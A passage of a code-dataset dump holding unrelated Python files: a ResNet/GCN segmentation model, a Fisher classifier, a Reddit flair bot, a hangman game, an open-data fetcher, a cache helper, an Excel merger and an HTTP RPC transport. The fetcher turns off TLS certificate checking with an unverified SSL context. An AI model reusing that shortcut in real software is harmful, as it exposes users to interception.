super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNetNoFc(nn.Module):\n\n def __init__(self, block, layers, num_classes=6):\n self.inplanes = 64\n super(ResNetNoFc, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n # self.avgpool = nn.AvgPool2d(7, stride=1)\n # self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x_ds4 = self.layer1(x)\n x_ds8 = self.layer2(x_ds4)\n x_ds16 = self.layer3(x_ds8)\n x_ds32 = self.layer4(x_ds16)\n\n return x_ds32, x_ds16, x_ds8, x_ds4\n\n\ndef resnet18(init_state_path=None, **kwargs):\n model = ResNetNoFc(BasicBlock, [2, 2, 2, 2], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet34(init_state_path=None, **kwargs):\n model = ResNetNoFc(BasicBlock, [3, 4, 6, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet50(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 4, 6, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet101(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 4, 23, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\ndef resnet152(init_state_path=None, **kwargs):\n model = ResNetNoFc(Bottleneck, [3, 8, 36, 3], **kwargs)\n if init_state_path is not None:\n checkpoint = torch.load(init_state_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint)\n return model\n\n\nclass GCN(nn.Module):\n def __init__(self, feature_in_num, feature_out_num=21, kernal_size=15):\n super(GCN, self).__init__()\n self.left = nn.Sequential(\n nn.Conv2d(feature_in_num, feature_out_num, kernel_size=(kernal_size, 1), stride=1,\n padding=((kernal_size - 1) / 2, 0), bias=True),\n nn.Conv2d(feature_out_num, feature_out_num, kernel_size=(1, kernal_size), stride=1,\n padding=(0, (kernal_size - 1) / 2), bias=True)\n )\n self.right = nn.Sequential(\n nn.Conv2d(feature_in_num, feature_out_num, kernel_size=(1, kernal_size), stride=1,\n padding=(0, (kernal_size - 1) / 2), bias=True),\n nn.Conv2d(feature_out_num, feature_out_num, kernel_size=(kernal_size, 1), stride=1,\n padding=((kernal_size - 1) / 2, 0), bias=True)\n )\n\n def forward(self, x):\n return self.left(x) + self.right(x)\n\n\nclass BR(nn.Module):\n def __init__(self, feature_num=21):\n super(BR, self).__init__()\n self.transform = nn.Sequential(\n nn.Conv2d(feature_num, feature_num, kernel_size=3, stride=1, padding=1, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(feature_num, feature_num, kernel_size=3, stride=1, padding=1, bias=True)\n )\n\n def forward(self, x):\n return x + self.transform(x)\n\n\nclass GCNMoudle(nn.Module):\n def __init__(self, features_in_num, feature_out_num=21, kernal_size=15):\n super(GCNMoudle, self).__init__()\n self.kernal_size = kernal_size\n self.transform = []\n for i in range(len(features_in_num)):\n self.transform.append(self._feature_transform(features_in_num[i], feature_out_num))\n\n self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_in_num, feature_out_num):\n transform = nn.Sequential(\n GCN(feature_in_num, feature_out_num, kernal_size=self.kernal_size),\n BR(feature_out_num)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n for i in range(len(x)):\n output.append(self.transform[i](x[i]))\n\n return output\n\nclass CAB(nn.Module):\n def __init__(self):\n super(CAB, self).__init__()\n self.score_map = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(42, 42, kernel_size=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(42, 21, kernel_size=1)\n\n )\n def forward(self, x_high, x_low):\n x = torch.cat((x_high, x_low), dim=1)\n x = self.score_map(x)\n x = F.sigmoid(x)\n x = x * x_low\n x = x + x_high\n return x\n\nclass OuputMoudle(nn.Module):\n def __init__(self, feature_num):\n super(OuputMoudle, self).__init__()\n self.transform0 = nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n self.transform1 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n self.transform2 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n self.transform3 = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True),\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True),\n BR(feature_num)\n )\n self.cab1 = CAB()\n self.cab2 = CAB()\n self.cab3 = CAB()\n\n def forward(self, x):\n out = self.transform0(x[0])\n out = self.cab1(out, x[1])\n out = self.transform1(out)\n out = self.cab2(out, x[2])\n out = self.transform2(out)\n out = self.cab3(out, x[3])\n out = self.transform3(out)\n\n return out\n\n\nclass MergeModule(nn.Module):\n def __init__(self, feature_num=21, num_level=4):\n super(MergeModule, self).__init__()\n self.transform = []\n for i in range(num_level):\n self.transform.append(self._feature_transform(feature_num))\n\n self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_num):\n transform = nn.Sequential(\n BR(feature_num),\n nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=2, padding=0, bias=True)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n output.append(x[0])\n\n for i in range(1, len(x)):\n output.append(x[i] + self.transform[i - 1](output[i - 1]))\n\n return output\n\n\nclass UpsampleModule(nn.Module):\n def __init__(self, feature_num=21, upsample_factors=[8, 4, 2, 1]):\n super(UpsampleModule, self).__init__()\n self.transform = []\n for i in range(len(upsample_factors)):\n self.transform.append(self._feature_transform(feature_num, upsample_factors[i]))\n\n self.transform = nn.ModuleList(self.transform)\n\n def _feature_transform(self, feature_num, upsample_factor):\n transform = nn.Sequential(\n BR(feature_num),\n nn.Upsample(scale_factor=upsample_factor, mode='bilinear')\n # nn.ConvTranspose2d(feature_num, feature_num, kernel_size=2, stride=upsample_factor, padding=0, bias=True)\n )\n\n return transform\n\n def forward(self, x):\n output = []\n for i in range(len(x)):\n output.append(self.transform[i](x[i]))\n\n return output\n\n\nclass ResnetGCN_CAB(nn.Module):\n def __init__(self, class_num=6, resnet_depth=18, kernal_size=15, feature_num=21, init_resnet_state_path=None,\n init_state_path=None):\n super(ResnetGCN_CAB, self).__init__()\n\n self.GCN = nn.Sequential(\n #GCNMoudle(features_in_num=[2048, 1024, 512, 256], feature_out_num=feature_num, kernal_size=kernal_size),\n GCNMoudle(features_in_num=[512, 256, 128, 64], feature_out_num=feature_num, kernal_size=kernal_size),\n OuputMoudle(feature_num=feature_num)\n )\n\n self.classification = nn.Conv2d(feature_num, class_num, kernel_size=1, stride=1, padding=0, bias=True)\n\n self._initialize_weights()\n\n if resnet_depth == 18:\n self.resnet = resnet18(init_state_path=init_resnet_state_path)\n\n\n\n def forward(self, x, target=None):\n resnet_output = self.resnet(x)\n gcn_output = self.GCN(resnet_output)\n out = self.classification(gcn_output)\n\n softmax_output = F.softmax(out)\n\n mask_out = Variable(softmax_output.data.max(1)[1])\n out_forshow = torch.max(softmax_output, dim=1)[1]\n\n if target is not None:\n pairs = {'out': (out, target),\n 'out2': (out, target),\n 'mask_out': (mask_out, target)\n }\n return pairs, self.exports(x, out_forshow * np.float(255.0), target * np.float(255.0))\n else:\n return self.exports(x, out_forshow, softmax_output)\n\n def exports(self, x, output, target):\n result = {'input': x, 'output': output}\n if target is not None:\n result['soft_out'] = target\n return result\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, 0.01)\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\ndef netParams(model):\n '''\n helper function to see total network parameters\n :param model: model\n :return: total network parameters\n '''\n total_paramters = 0\n for parameter in model.parameters():\n i = len(parameter.size())\n p = 1\n for j in range(i):\n p *= parameter.size(j)\n total_paramters += p\n\n return total_paramters\n\ndef get_FileSize(file_path):\n import os\n file_path = unicode(file_path, 'utf8')\n fsize = os.path.getsize(file_path)\n fsize = fsize / float(1024*1024)\n return round(fsize, 2)\n\nif __name__ == \"__main__\":\n import time\n\n images = Variable(torch.randn(1, 3, 512, 512))\n d = ResnetGCN_CAB()\n d = nn.DataParallel(d).cuda()\n print (d)\n print (\"do forward...\")\n start_time = time.time()\n outputs = d(images)\n import os\n\n print('process ', os.path.basename(__file__))\n print (outputs['output'].size())\n print('time:', time.time() - start_time)\n print('total parameter:', netParams(d))\n model_name = 'resnet_gcn_seg.pth'\n torch.save(d.state_dict(), model_name)\n print('model size:', get_FileSize(model_name), 'MB')\n","sub_path":"resnet_gcn_cab_with_sigmoid.py","file_name":"resnet_gcn_cab_with_sigmoid.py","file_ext":"py","file_size_in_byte":15625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330982931","text":"import math\n\nimport numpy as np\n\nfrom homework.ClassifierModel import Classifier\n\n\nclass Fisher(Classifier):\n def __init__(self):\n Classifier.__init__(self)\n self.u0 = None\n self.u1 = None\n\n def get_data(self, split):\n split_num = int(self.m * split)\n self.train_data = self.sample_data[0:split_num]\n self.test_data = self.sample_data[split_num:]\n self.expected = self.test_data[:, -1]\n\n def fit(self):\n n = self.sample_data.shape[1]\n data1 = np.mat([row for row in self.train_data if row[n - 1] > 0.5])\n data0 = np.mat([row for row in self.train_data if row[n - 1] < 0.5])\n x1 = data1[:, 0:-1]\n x0 = data0[:, 0:-1]\n num1 = x1.shape[0]\n num0 = x0.shape[0]\n u1 = sum(x1) / num1\n u0 = sum(x0) / num0\n s1 = np.mat(np.zeros((n - 1, n - 1)))\n s0 = np.mat(np.zeros((n - 1, n - 1)))\n for row in x1:\n e = np.mat(row - u1)\n s = e.T * e\n s1 += s\n for row in x0:\n e = np.mat(row - u0)\n s = e.T * e\n s0 += s\n sw = s0 + s1\n u = np.mat(u0 - u1)\n self.weights = sw.I * u.T\n self.u1 = u1\n self.u0 = u0\n\n def predict(self):\n feature_set = np.mat(self.test_data[:, 0:-1])\n u0_mean = self.u0 * self.weights\n u1_mean = self.u1 * self.weights\n for row in feature_set:\n u = row * self.weights\n if math.fabs(u1_mean - u) < math.fabs(u0_mean - u):\n row[0, 0] = 1\n else:\n row[0, 0] = 0\n self.predicted = feature_set[:, 0]\n","sub_path":"homework/FisherModel.py","file_name":"FisherModel.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480481340","text":"from itertools import groupby\n\n\ndef compress_string(s):\n keys = []\n groups = []\n for key, group in groupby(s):\n keys.append(int(key))\n groups.append(len(list(group)))\n\n # print(keys, groups)\n return list(zip(groups, keys))\n\n\nif __name__ == \"__main__\":\n # print(compress_string(\"111132222111132323\"))\n print(\"OK\" if compress_string('1222311') == [(1, 1), (3, 2), (1, 3), (2, 1)] else \"NOT OK\")\n","sub_path":"week_08/scripts/ex_8.py","file_name":"ex_8.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401224137","text":"import time\n\ndef updateRedditFlairs(subreddit, reddit):\n print(\"Hit the updateRedditFlairs function\")\n \"\"\"\n Bulk updates user flairs for the subreddit\n @param subreddit: PRAW Subreddit object instantiated with the subreddit of your choice (to change flair)\n @param reddit: PRAW Reddit object instantiated with the current user (to respond to messages)\n \"\"\"\n flair = subreddit.flair\n # We limit ourselves to 25 at a time to stay within API limits\n messages = []\n messages = reddit.inbox.unread(limit=25)\n\n messages = [message for message in messages]\n\n messagesToMark = []\n print(\"Got {num} unread flair requests!\".format(num=len(messages)))\n\n # Only do this part if there are any messages\n if len(messages) > 0:\n # Maybe this is redundant?\n while len(messages) > 0:\n # Iterate over all messages\n for message in messages:\n # Ensure the format of the request was correct\n if message.subject == \"flair\" and len(message.body) == 4 and message.author != \"[deleted]\":\n # Set the user's flair\n flair.set(\n redditor=message.author,\n css_class=message.body\n )\n print('Updated flair for {name} with flair class {flairClass}'.format(name=message.author, flairClass=message.body))\n # Reply to user and let them know their flair was updated\n message.reply(\"Flair for /r/WhoWouldWin Updated! Please do not respond to this message. Instead, send modmail to /r/WhoWouldWin.\")\n else:\n # Format was incorrect, or something else is wrong\n print(\"Skipped request from {name} with flair class {flairClass}\".format(name=message.author, flairClass=message.body))\n message.reply(\"Sorry, it doesn't look like your flair request for /r/WhoWouldWin was valid. Please do not respond to this message. Instead, send modmail to /r/WhoWouldWin.\")\n # Append this message to larger array of messages to be bulk marked as unread\n messagesToMark.append(message)\n # Mark all the previous messages as having been read\n print(\"Marking {numMessages} as unread...\".format(numMessages=len(messagesToMark)))\n reddit.inbox.mark_read(messagesToMark)\n\n # Wait 65 seconds (greater than 60 just in case...)\n print(\"Waiting 65 seconds between getting new flair requests...\")\n time.sleep(65)\n\n # Get new messages, and repeat the loop from the top\n messages = reddit.inbox.unread(limit=25)\n messages = [message for message in messages]\n print(\"Got {num} unread flair requests!\".format(num=len(messages)))\n messagesToMark = []\n print(\"No more requests to process!\")\n return True\n\n else:\n # If no new requests, exit\n print(\"No new flair requests!\")\n return True\n","sub_path":"bot_scripts/updateRedditFlairs/update_flairs.py","file_name":"update_flairs.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"317551318","text":"import random\nimport os\nimport pygame\nfrom turtle import *\nimport time\n\n\ndef choose_word():\n return random.sample(WORDS, 1) # chooses a word to play with\n\n\ndef clear_screen():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\") # clears screen\n\n\ndef hangman_(attempt=0):\n if attempt == 0:\n color('black')\n pensize(5)\n speed(5)\n fd(150)\n lt(180)\n fd(100)\n rt(90)\n fd(300)\n rt(90)\n fd(75)\n rt(90)\n fd(50)\n elif attempt == 1:\n rt(90)\n circle(25)\n return None\n elif attempt == 2:\n circle(25, 180)\n rt(90)\n fd(25)\n rt(90)\n fd(50)\n rt(180)\n fd(100)\n rt(180)\n fd(50)\n lt(90)\n fd(25)\n elif attempt == 3:\n rt(180)\n fd(25)\n lt(90)\n fd(50)\n lt(65)\n fd(25)\n lt(180)\n fd(50)\n elif attempt == 4:\n lt(180)\n fd(25)\n lt(115)\n fd(100)\n lt(120)\n fd(25)\n rt(180)\n fd(50)\n elif attempt == 5:\n rt(180)\n fd(25)\n lt(60)\n fd(50)\n lt(90)\n fd(55)\n elif attempt == 6:\n fd(20)\n elif attempt == 7:\n rt(45)\n fd(50)\n elif attempt == 8:\n fd(25)\n elif attempt == 9:\n rt(180)\n fd(75)\n rt(90)\n fd(50)\n elif attempt == 10:\n fd(25)\n print('You may now close turtle')\n done()\n\n\ndef game_loop():\n penup() # Set turtle to the correct position, make adjustment as you wish to setx and sety\n setx(-200)\n sety(-200)\n pendown()\n fd(1) # You must initialize turtle before pygame or else you will get an error\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/HangmanWav1.wav\")\n hangman.play()\n input(\"Press 'Enter' to play Hangman! \") # starts game\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/RUN.wav\")\n hangman.play()\n clear_screen() # clears screen\n word = choose_word()[0] # chooses a word\n word_guessed = [] # word in '-' and letter form\n for _ in word:\n word_guessed.append(\"-\") # create an unguessed, blank version of the word\n joined_word = None # joins the words in the list word_guessed\n tries = 10 # how many times you are aloud to fail\n guessed_letters = [] # list of all letters guessed\n hangman_() # Draws hangman\n while tries != 0 and \"-\" in word_guessed:\n print(\"\\nYou have {} attempts remaining\".format(tries))\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Tries.wav\")\n hangman.play()\n time.sleep(3)\n strs = ''.join(word_guessed)\n print(strs)\n try:\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Select.wav\")\n hangman.play()\n time.sleep(4)\n player_guess = str(input(\"\\nPlease select a letter between A-Z\" + \"\\n> \")).lower()\n\n except ValueError: # check valid input\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/ValidInput.wav\")\n hangman.play()\n print(\"That is not valid input. Please try again.\")\n time.sleep(3)\n continue\n\n else:\n if not player_guess.isalpha(): # check the input is a letter. Also checks an input has been made.\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/NotLetter.wav\")\n hangman.play()\n print(\"That is not a letter. Please try again.\")\n time.sleep(4.5)\n continue\n elif len(player_guess) > 1: # check the input is only one letter\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/MoreLetter.wav\")\n hangman.play()\n print(\"That is more than one letter. Please try again.\")\n time.sleep(3)\n continue\n elif player_guess in guessed_letters: # check it letter hasn't been guessed already\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Guessed.wav\")\n hangman.play()\n print(\"You have already guessed that letter. Please try again.\")\n time.sleep(5)\n continue\n else:\n pass\n\n guessed_letters.append(player_guess)\n\n for letter in range(len(word)):\n if player_guess.lower() == (word[letter].lower()):\n word_guessed[letter] = player_guess # replace all letters in the chosen word that match the players guess\n pygame.init()\n drums = pygame.mixer.Sound(\"./media/drum_roll_y.wav\")\n drums.play()\n\n if player_guess.lower() not in word.lower():\n tries -= 1\n pygame.init()\n gasp = pygame.mixer.Sound(\"./media/gasp_x.wav\")\n gasp.play()\n hangman_(10-tries)\n\n if \"-\" not in word_guessed: # no blanks remaining\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Congrats.wav\")\n hangman.play()\n print(\"\\nCongratulations! {} was the word!\".format(word))\n pygame.init()\n cymbal = pygame.mixer.Sound(\"./media/applause3.wav\")\n cymbal.play()\n ball = pygame.mixer.Sound(\"./media/woow_x.wav\")\n ball.play()\n sphere = pygame.mixer.Sound(\"./media/Victory.wav\")\n sphere.play()\n reset()\n else: # loop must have ended because attempts reached 0\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/Unlucky.wav\")\n hangman.play()\n print(\"\\nUnlucky! The word was {}.\".format(word))\n pygame.init()\n hangman = pygame.mixer.Sound(\"./media/fail-trombone-02.wav\")\n hangman.play()\n\ntext_file = open('test.txt','rb')\ntext_content = str(text_file.read())[2:-1]\nWORDS = text_content.split(r'\\r\\n')[:-1]\n\ngame_loop()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149995968","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n__author__ = \"Chen\"\n\"\"\"\n桃園市住宿資料(中)\nInfoId(序號)、TYWebsite(導覽網網址)、Name(名稱)、Toldescribe(簡述)、Add(地址)、Zipcode(郵遞區號)、\nOpentime(開放時間)、Px(X座標)、Py(Y座標)、Website(網站)、Parkinginfo(停車資訊)、Remarks(旅遊叮嚀)、\nTel(電話)、Fax(傳真)、Changetime(更新時間)、Charge(更新時間)\n\"\"\"\n\nimport json\nimport sys \nimport urllib.request as httplib # 3.x\nimport ssl\ncontext = ssl._create_unverified_context()\n\nurl=\"https://data.tycg.gov.tw/opendata/datalist/datasetMeta/download?id=908d67d9-eb77-4f17-88c2-068b2dd74d27&rid=c3340a19-9219-498a-9a46-21de506ba85b\"\nreq=httplib.Request(url)\ntry:\n reponse = httplib.urlopen(req, context=context)\n if reponse.code==200:\n if (sys.version_info > (3, 0)):\n contents = reponse.read();\n else:\n contents = reponse.read()\n data = json.loads(contents)\n #html\n \"\"\"\n print(data['infos'][0])\n print(len(data['infos']))\n print(\"====\",data['infos'][0]['Name'],\"====\")\n print(\"導覽網址\",data['infos'][0]['TYWebsite'])\n print(\"地址\",data['infos'][0]['Add'])\n print(\"營業時間\",data['infos'][0]['Opentime'])\n print(\"停車資訊\",data['infos'][0]['Parkinginfo'])\n print(\"電話\",data['infos'][0]['Tel'])\n \"\"\"\n\n for x in range(0,len(data['infos'])):\n print(\"====\", data['infos'][x]['Name'], \"====\")\n print(\"地址\", data['infos'][x]['Add'])\n print(\"電話\", data['infos'][x]['Tel'])\n #else:\n # print(\"查無您所輸入的相關資料,請檢查是否有打錯字或是更換搜尋訊息\")\n\n\nexcept: # 處理網路連線異常\n print(\"error\") ","sub_path":"專05-LINE/3-HTTP_JSON -桃園市住宿.py","file_name":"3-HTTP_JSON -桃園市住宿.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181772822","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/x0ox/Dropbox/ActiveDev/yac/yac/lib/cache.py\n# Compiled at: 2017-11-16 20:28:41\nimport shelve, os, sys, time, datetime\nfrom yac.lib.paths import get_config_path\n\nclass CacheError:\n\n def __init__(self, msg):\n self.msg = msg\n\n\ndef set_cache_value_ms(key_name, value, expiration_ms=''):\n yac_db = _get_cache()\n if not expiration_ms:\n expiration_dt = datetime.date.today() + datetime.timedelta(days=365)\n expiration_ms = int(expiration_dt.strftime('%s')) * 1000\n yac_db[key_name] = {'value': value, 'expiration_ms': expiration_ms}\n\n\ndef set_cache_value_dt(key_name, value, expiration_dt=''):\n yac_db = _get_cache()\n if not expiration_dt:\n expiration_dt = datetime.date.today() + datetime.timedelta(days=365)\n expiration_ms = int(expiration_dt.strftime('%s')) * 1000\n yac_db[key_name] = {'value': value, 'expiration_ms': expiration_ms}\n\n\ndef get_cache_value(key_name, default_value={}):\n cache_db = _get_cache()\n time_ms = int(time.time() * 1000)\n if key_name in cache_db and time_ms < cache_db[key_name]['expiration_ms']:\n return cache_db[key_name]['value']\n else:\n return default_value\n\n\ndef delete_cache_value(key_name):\n cache_db = _get_cache()\n if key_name in cache_db:\n cache_db.pop(key_name)\n\n\ndef get_cache_keys():\n cache_db = _get_cache()\n return cache_db.keys()\n\n\ndef _get_cache():\n home = os.path.expanduser('~')\n db_home = os.path.join(home, '.yac')\n if not os.path.exists(db_home):\n os.makedirs(db_home)\n yac_db_path = os.path.join(db_home, 'yac_cache')\n cache_db = shelve.open(yac_db_path)\n return cache_db","sub_path":"pycfiles/yac-1.4.6.tar/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578584002","text":"from openpyxl import load_workbook\n#from openpyxl.styles import Font, Aligment, PatternFill, Color\nimport pandas as pd\nimport glob\nimport os\n\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.lbs.t2k\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k.8para\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k.12para\"\nmy_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.lbs.t2k\\\\190412.BLD0182.BLD0208.BLD0213.BLD0213-L1.BLD0216.BLD0225.BLD0226.BLD0261.BLD0316-L1\\\\\"\nos.chdir(my_folder)\n\nheader_size=2\n\nd='.'\nfolder_list = list(filter(lambda x: os.path.isdir(os.path.join(d, x)), os.listdir(d)))\nfolder_list.append('.')\nprint(\"folder list :\",folder_list)\n\nwriter = pd.ExcelWriter('sm5713.yield.trend.xlsx', engine='openpyxl')\n\nyield_data=0\nrow_len=[0]\nfile_cnt=0\n\nfor k in range(len(folder_list)):\n\n os.chdir(folder_list[k])\n file_list = glob.glob(\"*.xls\")\n\n for i in range(len(file_list)):\n\n df = pd.read_excel(file_list[i])\n yield_data+=len(df)-header_size-1 #처음(1~14)과 마지막라인을 제거한 전체 길이 산출 \n row_len.append(yield_data) #yield data를 printing하기 위해서 시작 위치 계산 필요함.\n print(file_list[i])\n\n #맨처음에 1~14 row까지만 초기에 형성\n if file_cnt==0:\n df[:header_size].to_excel(writer, startrow=0, index=False, header=False)\n print(df.columns[2],df.columns[3])\n df[header_size:-1].to_excel(writer, startrow=row_len[file_cnt]+header_size, index=False, header=False) #맨처음 1~14까지를 write하기 위해서 +header_size\n file_cnt+=1\n\n if len(folder_list)-1!=k: #마지막 폴더는 현재위치에서는 실행시키지 않음. 만들어지는 파일 위치가 하위 폴더로 가는 것을 막음.\n os.chdir('..')\n\nwriter.save()","sub_path":"holdlot/holdlot.py","file_name":"holdlot.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372314867","text":"# -*- test-case-name: vumi.transports.httprpc.tests.test_httprpc -*-\n\nimport json\n\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.python import log\nfrom twisted.web import http\nfrom twisted.web.resource import Resource\nfrom twisted.web.server import NOT_DONE_YET\n\nfrom vumi.transports.base import Transport\n\n\nclass HttpRpcHealthResource(Resource):\n isLeaf = True\n\n def __init__(self, transport):\n self.transport = transport\n Resource.__init__(self)\n\n def render_GET(self, request):\n request.setResponseCode(http.OK)\n return self.transport.get_health_response()\n\n\nclass HttpRpcResource(Resource):\n isLeaf = True\n\n def __init__(self, transport):\n self.transport = transport\n Resource.__init__(self)\n\n def render_(self, request, http_action=None):\n log.msg(\"HttpRpcResource HTTP Action: %s\" % (request,))\n request.setHeader(\"content-type\", \"text/plain\")\n msgid = Transport.generate_message_id()\n self.transport.requests[msgid] = request\n self.transport.handle_raw_inbound_message(msgid, request)\n return NOT_DONE_YET\n\n def render_PUT(self, request):\n return self.render_(request, \"render_PUT\")\n\n def render_GET(self, request):\n return self.render_(request, \"render_GET\")\n\n def render_POST(self, request):\n return self.render_(request, \"render_POST\")\n\n\nclass HttpRpcTransport(Transport):\n \"\"\"Base class for synchronous HTTP transports.\n\n Because a reply from an application worker is needed before the HTTP\n response can be completed, a reply needs to be returned to the same\n transport worker that generated the inbound message. This means that\n currently there many only be one transport worker for each instance\n of this transport of a given name.\n \"\"\"\n\n def get_transport_url(self, suffix=''):\n \"\"\"\n Get the URL for the HTTP resource. Requires the worker to be started.\n\n This is mostly useful in tests, and probably shouldn't be used\n in non-test code, because the API might live behind a load\n balancer or proxy.\n \"\"\"\n addr = self.web_resource.getHost()\n return \"http://%s:%s/%s\" % (addr.host, addr.port, suffix.lstrip('/'))\n\n @inlineCallbacks\n def setup_transport(self):\n self.requests = {}\n\n # start receipt web resource\n self.web_resource = yield self.start_web_resources(\n [\n (HttpRpcResource(self), self.config['web_path']),\n (HttpRpcHealthResource(self), 'health'),\n ],\n self.config['web_port'])\n\n @inlineCallbacks\n def teardown_transport(self):\n yield self.web_resource.loseConnection()\n\n def get_health_response(self):\n return json.dumps({\n 'pending_requests': len(self.requests)\n })\n\n def 